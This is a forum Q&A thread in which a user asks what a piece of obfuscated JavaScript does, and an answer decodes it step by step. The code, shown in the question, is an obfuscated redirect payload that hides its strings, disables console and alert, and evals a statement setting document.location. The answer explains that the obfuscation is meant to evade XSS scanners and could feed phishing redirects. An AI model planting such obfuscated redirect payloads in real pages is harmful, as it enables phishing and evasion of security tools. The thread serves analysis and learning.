Can anyone explain this javascript exploit?

Question

var a = ['document', 'window', String];
var b = '108 111 99 97 116 105 111 110';
var c = '%68%74%74%70%73%3a%2f%2f%77%77%77%2e%74%75%6d%62%6c%72%2e%63%6f%6d';
var d = 'ZnJvbUNoYXJDb2Rl';
var e = 'ZGVjb2RlVVJJQ29tcG9uZW50';
var f = '1c2o3n4s5o6l7e8', g = '6a5l4e3r2t1';
function x(s) {
    var ss = s.split(' '); s = '';
    for (var i = 0; i < ss.length; i++) s += a[2][atob(d)](ss[i]);
    return s;
}
console = null;
function y(s) {
    var ss = '';
    for (var i = 1; i < s.length; i+= 2) ss += s[i];
    return ss;
}
a[1][y(f)] = a[1][y(g)] = null;
var s = a[0] + '["' + x(b) + '"]=' + a[1] + '["' + atob(e) + '"]("' + c + '")';
eval(s);

I am new to exploits and would like to know what does this exploit do ? How to do analysis for such exploits, what's the best approach to understand such things ? I know basics of reverse engineering and assembly, but I was not able to figure out this one.

Answer 1

It executes the following:

document["location"]=windows["decodeURIComponent"]("https://www.tumblr.com")

Which redirects you to tumblr.com.

It is pure obfuscation of code.

var s = a[0] + '["' + x(b) + '"]=' + a[1] + '["' + atob(e) + '"]("' + c + '")';
    ^   ^             ^              ^             ^                  ^
Payload=document["   (1)      "]= windows    [base64 encoded   ]( url http encoded string)

The following converts ascii character codes to string

(1): for (var i = 0; i < ss.length; i++) s += a[2][atob(d)](ss[i])

The main aim of doing this is to hide from softwares looking for XSS like some antivirus. Yet this is only a payload, the real exploit would be a flaw allowing you to insert this on a legit web site to redirect to another website that may be a clone with just slightly different URL to trick someone. But it is more accurate to question about this on security.stackexchange.com

Node is a good tool to evaluate unsafe browser Javascript if you replace some things (like atob) by home made equivalents.